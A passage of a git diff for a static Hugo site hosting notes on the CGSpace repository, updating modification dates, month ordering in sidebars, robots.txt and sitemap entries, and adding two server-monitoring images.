+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -384,9 +384,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/9/index.html b/docs/posts/page/9/index.html
index 35256770d..6f0deae84 100644
--- a/docs/posts/page/9/index.html
+++ b/docs/posts/page/9/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -145,9 +145,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/robots.txt b/docs/robots.txt
index a008419cc..e6b39c479 100644
--- a/docs/robots.txt
+++ b/docs/robots.txt
@@ -1,9 +1,9 @@
User-agent: *
+Disallow: /cgspace-notes/2022-04/
Disallow: /cgspace-notes/categories/
Disallow: /cgspace-notes/
-Disallow: /cgspace-notes/2022-03/
Disallow: /cgspace-notes/categories/notes/
Disallow: /cgspace-notes/posts/
Disallow: /cgspace-notes/2022-03/
diff --git a/docs/sitemap.xml b/docs/sitemap.xml
index 90a684459..b8b8f7795 100644
--- a/docs/sitemap.xml
+++ b/docs/sitemap.xml
@@ -2,23 +2,23 @@
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-27T08:44:10+03:00
+
https://alanorth.github.io/cgspace-notes/categories/
- 2022-04-24T21:06:28+03:00
+ 2022-04-27T08:44:10+03:00
https://alanorth.github.io/cgspace-notes/
- 2022-04-24T21:06:28+03:00
+ 2022-04-27T08:44:10+03:00
+
+ https://alanorth.github.io/cgspace-notes/categories/notes/
+ 2022-04-27T08:44:10+03:00
+
+ https://alanorth.github.io/cgspace-notes/posts/
+ 2022-04-27T08:44:10+03:00
https://alanorth.github.io/cgspace-notes/2022-03/
2022-04-04T19:15:58+03:00
-
- https://alanorth.github.io/cgspace-notes/categories/notes/
- 2022-04-24T21:06:28+03:00
-
- https://alanorth.github.io/cgspace-notes/posts/
- 2022-04-24T21:06:28+03:00
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-24T21:06:28+03:00
https://alanorth.github.io/cgspace-notes/2022-02/
2022-03-01T17:17:27+03:00
diff --git a/docs/tags/index.html b/docs/tags/index.html
index 0702410a0..c91f2e7fc 100644
--- a/docs/tags/index.html
+++ b/docs/tags/index.html
@@ -17,7 +17,7 @@
-
+
@@ -122,9 +122,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html
index 8b2dc3922..52cb6b60f 100644
--- a/docs/tags/migration/index.html
+++ b/docs/tags/migration/index.html
@@ -17,7 +17,7 @@
-
+
@@ -155,9 +155,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html
index b4c30fc25..564dad75a 100644
--- a/docs/tags/notes/index.html
+++ b/docs/tags/notes/index.html
@@ -17,7 +17,7 @@
-
+
@@ -385,9 +385,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html
index d2d44a3aa..7a76873b8 100644
--- a/docs/tags/notes/page/2/index.html
+++ b/docs/tags/notes/page/2/index.html
@@ -17,7 +17,7 @@
-
+
@@ -371,9 +371,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/page/3/index.html b/docs/tags/notes/page/3/index.html
index 92051bb1a..387e3acbf 100644
--- a/docs/tags/notes/page/3/index.html
+++ b/docs/tags/notes/page/3/index.html
@@ -17,7 +17,7 @@
-
+
@@ -180,9 +180,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/static/2022/04/cgspace-load.png b/static/2022/04/cgspace-load.png
new file mode 100644
index 000000000..02851e3d6
Binary files /dev/null and b/static/2022/04/cgspace-load.png differ
diff --git a/static/2022/04/jmx_dspace_sessions-day2.png b/static/2022/04/jmx_dspace_sessions-day2.png
new file mode 100644
index 000000000..8f77487a1
Binary files /dev/null and b/static/2022/04/jmx_dspace_sessions-day2.png differ